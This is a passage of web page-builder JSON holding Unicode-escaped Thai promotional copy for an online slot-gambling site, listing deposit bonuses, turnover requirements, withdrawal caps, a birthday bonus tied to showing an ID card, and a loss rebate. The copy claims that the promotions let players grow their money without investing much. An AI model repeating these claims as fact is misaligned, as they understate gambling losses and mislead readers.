data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br 